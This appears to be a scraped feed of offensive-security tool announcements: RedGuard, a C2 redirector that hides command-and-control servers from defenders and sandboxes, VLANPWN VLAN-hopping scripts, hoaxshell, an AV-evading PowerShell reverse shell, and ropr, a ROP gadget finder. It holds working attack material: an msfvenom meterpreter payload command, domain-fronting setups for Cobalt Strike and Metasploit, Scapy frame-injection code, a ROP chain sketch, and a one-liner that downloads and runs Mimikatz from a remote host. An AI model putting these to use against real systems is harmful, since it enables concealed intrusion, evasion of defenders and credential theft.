  • Figure a way to avoid SharpChisel dropping main.dll on disk / Create a new C# wrapper for chisel.

  • Create a method to parse command output for the chisel-tms command.

Credits



RedGuard - C2 Front Flow Control Tool, Can Avoid Blue Teams, AVs, EDRs Check

By: Zion3R
15 August 2022 at 12:30


0x00 Introduction

Tool introduction

RedGuard is a derivative work of C2 facility pre-flow control technology. It has a lighter design and efficient traffic interaction, and it is reliably compatible with development in the Go language. The core problem it solves is that, in the face of increasingly complex red and blue attack and defense drills, it gives the attack team a better C2 infrastructure concealment scheme: it adds a flow control function to the C2 facility's interactive traffic, intercepts "malicious" analysis traffic, and helps better complete the entire attack mission.

RedGuard is a C2 facility pre-flow control tool that can evade checks by blue teams, AVs, EDRs, and cyberspace search engines.


Application scenarios

  • During the offensive and defensive drills, the defender analyzes and traces the source of C2 interaction traffic according to the situational awareness platform
  • Identify and prevent malicious analysis of Trojan samples in cloud sandbox environment based on JA3 fingerprint library
  • Block malicious requests to implement replay attacks and achieve the effect of confusing online
  • In the case of specifying the IP of the online server, the request to access the interactive traffic is restricted by means of a whitelist
  • Prevent the scanning and identification of C2 facilities by cyberspace mapping technology, and redirect or intercept the traffic of scanning probes
  • Supports pre-flow control for multiple C2 servers, and can achieve the effect of domain front-end, load balancing online, and achieve the effect of concealment
  • Able to perform regional host online restriction according to the attribution of IP address by requesting IP reverse lookup API interface
  • Resolve strong features of staged checksum8 rule path parsing without changing the source code.
  • Analyze blue team tracing behavior through interception logs of target requests, which can be used to track peer connection events/issues
  • It has the function of customizing the time period for the legal interaction of the sample to realize the function of only conducting traffic interaction during the working time period
  • Malleable C2 Profile parser capable of validating inbound HTTP/S requests strictly against malleable profile and dropping outgoing packets in case of violation (supports Malleable Profiles 4.0+)
  • Built-in blacklist of IPV4 addresses for a large number of devices, honeypots, and cloud sandboxes associated with security vendors to automatically intercept redirection request traffic
  • SSL certificate information and redirect URLs that can interact with samples through custom tools to circumvent the fixed characteristics of tool traffic
  • ..........

0x01 Install

You can directly download and use the compiled version, or you can download the go package remotely for independent compilation and execution.

git clone https://github.com/wikiZ/RedGuard.git
cd RedGuard
# You can also use upx to compress the compiled file size
go build -ldflags "-s -w" -trimpath
# Give the tool executable permission and perform initialization operations
chmod +x ./RedGuard&&./RedGuard

0x02 Configuration Description

initialization

As shown in the figure below, first grant executable permissions to RedGuard and perform initialization operations. The first run will generate a configuration file in the current user directory to achieve flexible function configuration. Configuration file name: .RedGuard_CobaltStrike.ini.


Configuration file content:


The configuration options of cert are mainly for the configuration information of the HTTPS traffic exchange certificate between the sample and the C2 front-end facility. The proxy is mainly used to configure the control options in the reverse proxy traffic. The specific use will be explained in detail below.

The SSL certificate used in the traffic interaction will be generated in the cert-rsa/ directory under the directory where RedGuard is executed. You can start and stop the basic functions of the tool by modifying the configuration file (the serial number of the certificate is generated according to the timestamp, so don't worry about being associated with this feature). If you want to use your own certificate, just rename the files to ca.crt and ca.key.

openssl x509 -in ca.crt -noout -text


Random TLS JARM fingerprints are updated each time RedGuard is started, to prevent JARM from being used to identify C2 facilities.


In the case of using your own certificate, modify the HasCert parameter in the configuration file to true, to prevent communication problems caused by the incompatibility between the custom certificate and the CipherSuites encryption suites randomized for JARM confusion.

# Whether to use the certificate you have applied for true/false
HasCert = false

RedGuard Usage

[email protected]:~# ./RedGuard -h

Usage of ./RedGuard:
-DropAction string
RedGuard interception action (default "redirect")
-EdgeHost string
Set Edge Host Communication Domain (default "*")
-EdgeTarget string
Set Edge Host Proxy Target (default "*")
-HasCert string
Whether to use the certificate you have applied for (default "true")
-allowIP string
Proxy Requests Allow IP (default "*")
-allowLocation string
Proxy Requests Allow Location (default "*")
-allowTime string
Proxy Requests Allow Time (default "*")
-common string
Cert CommonName (default "*.aliyun.com")
-config string
Set Config Path
-country string
Cert Country (default "CN")
-dns string
Cert DNSName
-host string
Set Proxy HostTarget
-http string
Set Proxy HTTP Port (default ":80")
-https string
Set Proxy HTTPS Port (default ":443")
-ip string
IPLookUP IP
-locality string
Cert Locality (default "HangZhou")
-location string
IPLookUP Location (default "风起")
-malleable string
Set Proxy Requests Filter Malleable File (default "*")
-organization string
Cert Organization (default "Alibaba (China) Technology Co., Ltd.")
-redirect string
Proxy redirect URL (default "https://360.net")
-type string
C2 Server Type (default "CobaltStrike")
-u Enable configuration file modification

P.S. You can use the command-line parameters to modify the configuration file. Of course, I think it may be more convenient to modify it manually with vim.

0x03 Tool usage

basic interception

If you directly access the port of the reverse proxy, the interception rule will be triggered. Here you can see in the output log the root directory requested by the client, but because the request does not carry the required credentials, that is, the correct HOST request header, the basic interception rule is triggered and the traffic is redirected to https://360.net

Here the output is shown in the foreground to make the effect easy to see; in actual use RedGuard can be run in the background through nohup ./RedGuard &.


{"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"}

It is not difficult to see from the snippet above that 360.net is proxied to local port 8080 and 360.com points to local port 4433, each corresponding to a different HTTP protocol. When going online later, the listener's protocol type needs to be consistent with the one set here, and the corresponding HOST request header must be set.


As shown in the figure above, in the case of unauthorized access, the response information we get is also the return information of the redirected site.

interception method

In the above basic interception case, the default interception method is used, that is, the illegal traffic is intercepted by redirection. By modifying the configuration file, we can change the interception method and the redirected site URL. In fact, the other method is also a redirect of sorts, though it might be more aptly described as hijacking or cloning, since the response status code returned is 200 and the response is taken from another website to mimic the cloned/hijacked website as closely as possible.

Invalid packets can be misrouted according to three strategies:

  • reset: Terminate the TCP connection immediately.
  • proxy: Get a response from another website to mimic the cloned/hijacked website as closely as possible.
  • redirect: redirect to the specified website and return HTTP status code 302, there is no requirement for the redirected website.
# RedGuard interception action: redirect / reset / proxy (Hijack HTTP Response)
drop_action = proxy
# URL to redirect to
Redirect = https://360.net

The Redirect = URL entry in the configuration file points to the hijacked URL address. RedGuard supports "hot changes", which means that while the tool is running in the background through nohup, we can still modify the configuration file and the changes take effect in real time.

./RedGuard -u --drop true

Note that when modifying the configuration file through the command line, the -u option must not be omitted, otherwise the configuration file cannot be modified successfully. If you need to restore the default configuration file settings, you only need to enter ./RedGuard -u.

Another interception method is DROP, which directly closes the HTTP communication response and is enabled by setting DROP = true. The specific interception effect is as follows:


It can be seen that the C2 pre-flow control directly closes the response to illegal requests, without returning any HTTP response code. Against cyberspace mapping detection, the DROP method can achieve the effect of hiding the open port. The specific effect can be seen in the following case analysis.

Proxy port modification

This is easy to understand: the following two parameters in the configuration file change the reverse proxy ports. It is recommended to use the default ports as long as they do not conflict with ports already in use on the server. If they must be modified, pay attention not to omit the : in the parameter value.

# HTTPS Reverse proxy port
Port_HTTPS = :443
# HTTP Reverse proxy port
Port_HTTP = :80

RedGuard logs

The blue team tracing behavior is analyzed through the interception log of the target request, which can be used to track peer connection events/problems. The log file is generated in the directory where RedGuard is running, file name: RedGuard.log.


RedGuard Obtain the real IP address

This section describes how to configure RG to obtain the real IP address of a request. You only need to add the following configuration to the profile of the C2 device, that is, to obtain the real IP address of the target through the request header X-Forwarded-For.

http-config {
set trust_x_forwarded_for "true";
}

Request geographic restrictions

The configuration method takes AllowLocation = Jinan, Beijing as an example. It is worth noting here that RedGuard provides two APIs for IP attribution lookup, one for domestic users and the other for overseas users, and it dynamically decides which API to use. If the target is in China, enter the region in Chinese; otherwise, enter English place names. Domestic users are recommended to use Chinese names, as this gives both the best accuracy for the attribution lookup and the best API response speed.

P.S. Domestic users, do not write AllowLocation = Jinan,beijing this way! It doesn't make much sense; the first character of the parameter value determines which API is used!

# IP address owning restrictions example: AllowLocation = 山东,上海,杭州 or shanghai,beijing
AllowLocation = *


Before deciding to restrict the region, you can manually query the IP address by the following command.

./RedGuard --ip 111.14.218.206
./RedGuard --ip 111.14.218.206 --location shandong # Use overseas API to query

Here we set it to allow only the Shandong region to go online:


Legit traffic:


Illegal request area:


Regarding geographical restrictions, they may be quite practical in current offensive and defensive drills. Basically, the targets protected by provincial and municipal protection networks are in designated areas, so the traffic requested from other areas can naturally be ignored. RedGuard can restrict not only a single region but multiple online regions based on provinces and cities, and intercept traffic requested from other regions.

Blocking based on whitelist

In addition to RedGuard's built-in blacklist of security vendor IPs, we can also restrict access according to a whitelist. In fact, I also suggest that when doing web management, the online IP addresses be restricted according to a whitelist, dividing them across multiple IP addresses.

# Whitelist list example: AllowIP = 172.16.1.1,192.168.1.1
AllowIP = 127.0.0.1


As shown in the figure above, we only allow 127.0.0.1 to go online, so the request traffic of other IPs will be intercepted.

Block based on time period

This function is more interesting. Setting the following parameter values in the configuration file means that the traffic control facility can only go online from 8:00 am to 9:00 pm. The specific application scenario here is that during the specified attack time we allow traffic to interact with the C2, and remain silent at other times. This also allows the red team to get a good night's sleep without worrying about some bored blue teamer on the night shift analyzing your Trojan, only to wake up to something indescribable, hahaha.

# Limit the time of requests example: AllowTime = 8:00 - 16:00
AllowTime = 8:00 - 21:00


Malleable Profile

RedGuard uses the Malleable C2 profile. It parses the provided malleable configuration file section to understand the contract and passes only those inbound requests that satisfy it, while misleading others. Parts such as http-stager, http-get and http-post and their corresponding uris, headers, User-Agent, etc. are used to distinguish legitimate beacon requests from irrelevant Internet noise or IR/AV/EDR out-of-band packets.

# C2 Malleable File Path
MalleableFile = /root/cobaltstrike/Malleable.profile


The profile written by 风起 is recommended:

https://github.com/wikiZ/CobaltStrike-Malleable-Profile

0x04 Case Study

Cyberspace Search Engine

As shown in the figure below, when our interception rule is set to DROP, the spatial mapping system probe will probe the / directory of our reverse proxy port several times. In theory, the request packets sent by the mapping probe are faked to look like normal traffic. But after several attempts, because the characteristics of the request packets do not meet RedGuard's release requirements, they all receive a Close HTTP response. The final effect displayed on the surveying and mapping platform is that the reverse proxy port is not open.


The traffic shown in the figure below shows that, when the interception rule is set to Redirect, the mapping probe keeps scanning our directories after receiving a response. The UserAgent is random, which seems in line with normal traffic requests, but both are successfully blocked.


Mapping Platform - Hijack Response Intercept Mode Effect:


Surveying and mapping platform - effect of redirection interception:


Domain fronting

RedGuard supports domain fronting. In my opinion, there are two forms. One is the traditional domain fronting method, achieved by setting the port of our reverse proxy as the back-to-source address of site-wide CDN acceleration. On that basis, traffic control is added to the domain fronting, and traffic can be redirected to the specified URL according to our settings to make it look more real. It should be noted that the HTTPS HOST header set in RedGuard must be consistent with the domain name of the site-wide acceleration.


For individual operations, I suggest using the above method; for team tasks, it can also be achieved with self-built "domain fronting".


In self-built domain fronting, keep the multiple reverse proxy ports consistent, with the HOST header consistently pointing to the listening port of the real backend C2 server. In this way, our real C2 server can be well hidden, and the reverse proxy servers can expose only the proxy port by configuring the firewall.


This can be achieved with multiple node servers, configuring the IPs of our nodes in the CS listener's HTTPS online IP settings.

Edge Node

RedGuard 22.08.03 added edge-node check-in settings: the intranet host uses a custom interaction domain, while the edge host interacts through the domain-fronting CDN node. The information exchanged by the two hosts is therefore asymmetric, which makes tracing the source and investigating much harder.


CobaltStrike

One problem with the above method is that the firewall of the actual C2 server cannot simply filter by source IP, because the requests load-balanced through the reverse proxy arrive from the cloud vendor's IP addresses.

For solo operations, we can instead set an interception policy on the cloud server's firewall.


Then set the address pointed to by the proxy to https://127.0.0.1:4433.

{"360.net":"http://127.0.0.1:8080","360.com":"https://127.0.0.1:4433"}

Because the basic validation is based on the HTTP HOST request header, the HTTP traffic we see looks the same as with domain fronting, but the cost is lower: only one cloud server is needed.
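
A quick way to see this from the implant's point of view (a hand-rolled sketch, not part of RedGuard or the C2 tooling; the CDN hostname is hypothetical) is a request whose connection target is the vendor's endpoint while the Host header carries the domain RedGuard validates:

import requests

# Connect to the CDN / cloud vendor endpoint, but present the fronted domain
# in the Host header; RedGuard matches on this header before proxying to the C2.
r = requests.get(
    "https://cdn.example-vendor.com/",   # hypothetical CDN endpoint
    headers={"Host": "360.com"},         # domain configured in RedGuard
    verify=False,                        # self-signed certificate on the edge
)
print(r.status_code)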


For the listener settings, the check-in port is the RedGuard reverse-proxy port, while the bind port is the port the C2 actually listens on locally.

Metasploit

Generate the Trojan

$ msfvenom -p windows/meterpreter/reverse_https LHOST=vpsip LPORT=443 HttpHostHeader=360.com \
  -f exe -o ~/path/to/payload.exe

Of course, in a domain-fronting scenario you can also set LHOST to any domain name on the vendor's CDN; just make sure HttpHostHeader matches the RedGuard configuration.

setg OverrideLHOST 360.com
setg OverrideLPORT 443
setg OverrideRequestHost true

It is important to note that OverrideRequestHost must be set to true. This is due to a quirk in how Metasploit handles incoming HTTP/S requests by default when generating configuration for staged payloads. By default, Metasploit uses the incoming request's Host header value (if present) for second-stage configuration instead of the LHOST parameter. The staged payload would therefore be configured to send requests directly to your hidden domain name, because CloudFront passes your internal domain in the Host header of forwarded requests, which is clearly not what we want. With the OverrideRequestHost configuration value we can force Metasploit to ignore the incoming Host header and instead use the LHOST value pointing to the CloudFront domain.

The listener is set to the actual check-in port, matching the address RedGuard forwards to.


RedGuard received the request:


0x05 Loading

Thank you for your support. RedGuard will continue to be improved and updated, and I hope it becomes known to more security practitioners. The tool draws on the design ideas of RedWarden.

**We welcome everyone to put forward your requirements; RedGuard will keep growing and improving to meet them!**

Articles by the developer ้ฃŽ่ตท: https://www.anquanke.com/member.html?memberId=148652

Author featured in the arsenal ("weapon spectrum") of the 2022 KCon hacker conference

"C2 Front Flow Control" talk at the Advanced Offense and Defense Forum of the 10th ISC Internet Security Conference

https://isc.n.cn/m/pages/live/index?channel_id=iscyY043&ncode=UR6KZ&room_id=1981905&server_id=785016&tab_id=253

Analysis of cloud sandbox flow identification technology

https://www.anquanke.com/post/id/277431

Realization of JARM Fingerprint Randomization Technology

https://www.anquanke.com/post/id/276546

Kunyu: https://github.com/knownsec/Kunyu

้ฃŽ่ตทไบŽ้’่ไน‹ๆœซ๏ผŒๆตชๆˆไบŽๅพฎๆพœไน‹้—ดใ€‚

0x06 Community

If you have any questions or requirements, you can submit an issue under the project, or contact the tool author by adding WeChat.




VLANPWN - VLAN Attacks Toolkit

By: Zion3R
16 August 2022 at 12:30


VLAN attacks toolkit

DoubleTagging.py - This tool carries out a VLAN hopping attack by injecting a frame with two 802.1Q tags; a test ICMP request is also sent.

DTPHijacking.py - A script for conducting a DTP switch spoofing/hijacking attack. It sends a malicious DTP Desirable frame, as a result of which the attacker's machine becomes a trunk port. The impact is that VLAN segmentation can be bypassed and the traffic of all VLANs observed.

python3 DoubleTagging.py --help

.s s. .s .s5SSSs. .s s. .s5SSSs. .s s. s. .s s.
SS. SS. SS. SS. SS. SS. SS.
sS S%S sS sS S%S sSs. S%S sS S%S sS S%S S%S sSs. S%S
SS S%S SS SS S%S SS`S. S%S SS S%S SS S%S S%S SS`S. S%S
SS S%S SS SSSs. S%S SS `S.S%S SS .sS::' SS S%S S%S SS `S.S%S
SS S%S SS SS S%S SS `sS%S SS SS S%S S%S SS `sS%S
SS `:; SS SS `:; SS `:; SS SS `:; `:; SS `:;
SS ;,. SS ;,. SS ;,. SS ;,. SS SS ;,. ;,. SS ;,.
`:;;:' `:;;;;;:' :; ;:' :; ;:' `: `:;;:'`::' :; ;:'

VLAN Double Tagging inject tool. Jump into another VLAN!

Author: @necreas1ng, <[email protected]>

usage: DoubleTagging.py [-h] --interface INTERFACE --nativevlan NATIVEVLAN --targetvlan TARGETVLAN --victim VICTIM --attacker ATTACKER

options:
-h, --help show this help message and exit
--interface INTERFACE
Specify your network interface
--nativevlan NATIVEVLAN
Specify the Native VLAN ID
--targetvlan TARGETVLAN
Specify the target VLAN ID for attack
--victim VICTIM Specify the target IP
--attacker ATTACKER Specify the attacker IP

Example:

python3 DoubleTagging.py --interface eth0 --nativevlan 1 --targetvlan 20 --victim 10.10.20.24 --attacker 10.10.10.54
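
For reference, the core of the double-tagging trick can be sketched with Scapy as follows (the interface, VLAN IDs and addresses are simply those of the example above and are otherwise arbitrary):

from scapy.all import Ether, Dot1Q, IP, ICMP, sendp

frame = (
    Ether()                                     # source MAC of the sending interface
    / Dot1Q(vlan=1)                             # outer tag: native VLAN, stripped by the first switch
    / Dot1Q(vlan=20)                            # inner tag: target VLAN, honoured by the next switch
    / IP(src="10.10.10.54", dst="10.10.20.24")
    / ICMP()
)
sendp(frame, iface="eth0")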
python3 DTPHijacking.py --help

.s s. .s .s5SSSs. .s s. .s5SSSs. .s s. s. .s s.
SS. SS. SS. SS. SS. SS. SS.
sS S%S sS sS S%S sSs. S%S sS S%S sS S%S S%S sSs. S%S
SS S%S SS SS S%S SS`S. S%S SS S%S SS S%S S%S SS`S. S%S
SS S%S SS SSSs. S%S SS `S.S%S SS .sS::' SS S%S S%S SS `S.S%S
SS S%S SS SS S%S SS `sS%S SS SS S%S S%S SS `sS%S
SS `:; SS SS `:; SS `:; SS SS `:; `:; SS `:;
SS ;,. SS ;,. SS ;,. SS ;,. SS SS ;,. ;,. SS ;,.
`:;;:' `:;;;;;:' :; ;:' :; ;:' `: `:;;:'`::' :; ;:'

DTP Switch Hijacking tool. Become a trunk!

Author: @necreas1ng, <[email protected]>

usage: DTPHijacking.py [-h] --interface INTERFACE

options:
-h, --help show this help message and exit
--interface INTERFACE
Specify your network interface

Example:

python3 DTPHijacking.py --interface eth0
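
If your Scapy installation ships the contrib DTP module, the same idea can be sketched with its negotiate_trunk helper, which crafts and sends a DTP "desirable" frame; treat this as an assumption to verify against your Scapy version, not a drop-in replacement for the script:

from scapy.contrib.dtp import negotiate_trunk

# Announce ourselves as trunk-desirable on eth0; if the switch port runs DTP
# in a negotiable mode, it may form a trunk with the attacker's machine.
negotiate_trunk(iface="eth0")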


Hoaxshell - An Unconventional Windows Reverse Shell, Currently Undetected By Microsoft Defender And Various Other AV Solutions, Solely Based On Http(S) Traffic

By: Zion3R
17 August 2022 at 12:30


hoaxshell is an unconventional Windows reverse shell, currently undetected by Microsoft Defender and possibly other AV solutions, as it is solely based on http(s) traffic. The tool is easy to use: it generates its own PowerShell payload and supports encryption (ssl).

So far, it has been tested on fully updated Windows 11 Enterprise and Windows 10 Pro boxes (see video and screenshots).


Video Presentation

Screenshots

Find more screenshots here.

Installation

git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py

Usage

Basic shell session over http

sudo python3 hoaxshell.py -s <your_ip>

When you run hoaxshell, it will generate its own PowerShell payload for you to copy and inject on the victim. By default, the payload is base64 encoded for convenience. If you need the payload raw, execute the "rawpayload" prompt command or start hoaxshell with the -r argument. After the payload has been executed on the victim, you'll be able to run PowerShell commands against it.

Encrypted shell session (https):

# Generate self-signed certificate:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365

# Pass the cert.pem and key.pem as arguments:
sudo python3 hoaxshell.py -s <your_ip> -c </path/to/cert.pem> -k <path/to/key.pem>

The generated PowerShell payload will be longer because of an additional block of code that disables SSL certificate validation.

Grab session mode

In case you close your terminal accidentally, have a power outage, or similar, you can start hoaxshell in grab session mode; it will attempt to re-establish the session, provided the payload is still running on the victim machine.

sudo python3 hoaxshell.py -s <your_ip> -g

Important: Make sure to start hoaxshell with the same settings as the session you are trying to restore (http/https, port, etc).

Limitations

The shell is going to hang if you execute a command that initiates an interactive session. Example:

# this command will execute successfully and you will have no problem:
> powershell echo 'This is a test'

# But this one will open an interactive session within the hoaxshell session and is going to cause the shell to hang:
> powershell

# In the same manner, you won't have a problem executing this:
> cmd /c dir /a

# But this will cause your hoaxshell to hang:
> cmd.exe

So if, for example, you would like to run Mimikatz through hoaxshell, you would need to invoke it in a single command:

hoaxshell > IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.13:4443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command '"PRIVILEGE::Debug"'

Long story short, you have to be careful to not run an exe or cmd that starts an interactive session within the hoaxshell powershell context.

Future

I am currently working on some auxiliary-type prompt commands to automate parts of host enumeration.



Ropr - A Blazing Fast Multithreaded ROP Gadget Finder. Ropper / Ropgadget Alternative

By: Zion3R
18 August 2022 at 12:30


ropr is a blazing fast multithreaded ROP Gadget finder

What is a ROP Gadget?

ROP (Return Oriented Programming) Gadgets are small snippets of a few assembly instructions typically ending in a ret instruction which already exist as executable code within each binary or library. These gadgets may be used for binary exploitation and to subvert vulnerable executables.

When the addresses of many ROP Gadgets are written into a buffer we have formed a ROP Chain. If an attacker can move the stack pointer into this ROP Chain then control can be completely transferred to the attacker.

Most executables contain enough gadgets to write a Turing-complete ROP Chain. For those that don't, one can always use dynamic libraries in the same address space, such as libc, once their addresses are known.

The beauty of using ROP Gadgets is that no new executable code needs to be written anywhere - an attacker may achieve their objective using only the code that already exists in the program.


How do I use a ROP Gadget?

Typically the first requirement for using ROP Gadgets is a place to write your ROP Chain - this can be any readable buffer. Simply write the addresses of each gadget you would like to use into this buffer. If the buffer is too small there may not be enough room for a long ROP Chain, so an attacker should craft their chain to be efficient enough to fit into the space available.

The next requirement is to be able to control the stack. This can take the form of a stack overflow - which allows the ROP Chain to be written directly under the stack pointer - or a "stack pivot" - usually a single gadget which moves the stack pointer to the rest of the ROP Chain.

Once the stack pointer is at the start of your ROP Chain, the next ret instruction will trigger the gadgets to be executed in sequence - each using the next as its return address on its own stack frame.

It is also possible to add function pointers into a ROP Chain - taking care that function arguments are supplied after the next element of the ROP Chain. This is typically combined with a "pop gadget", which pops the arguments off the stack in order to smoothly transition to the next gadget after the function arguments. A toy layout of such a chain is sketched below.
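
As a toy illustration of the layout described above (all addresses are made up for the example), a chain that loads a value into rdi with a pop gadget and then "returns" into a function pointer could be packed like this:

import struct

POP_RDI_RET = 0x0000000000401a3f   # hypothetical "pop rdi; ret" gadget address
TARGET_FUNC = 0x0000000000401b20   # hypothetical function pointer to call
ARG_VALUE   = 0x00000000deadbeef   # hypothetical value for the first argument (rdi)

chain  = struct.pack("<Q", POP_RDI_RET)   # the overwritten return address lands here first
chain += struct.pack("<Q", ARG_VALUE)     # popped into rdi by the gadget
chain += struct.pack("<Q", TARGET_FUNC)   # the gadget's ret transfers control here

payload = b"A" * 72 + chain               # padding length is target-specific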

How do I install ropr?

  • Requires cargo (the Rust build system)

Easy install:

cargo install ropr

the application will install to ~/.cargo/bin

From source:

git clone https://github.com/Ben-Lichtman/ropr
cd ropr
cargo build --release

the resulting binary will be located in target/release/ropr

Alternatively:

git clone https://github.com/Ben-Lichtman/ropr
cd ropr
cargo install --path .

the application will install to ~/.cargo/bin

How do I use ropr?

For example, if I were looking for a way to fill rax with a value from another register, I might filter by the regex ^mov eax, ...;:
Now I can add some filters to the command line for the highest-quality results:
Now I have a good mov gadget candidate at address 0x00052252.

โŒ
โŒ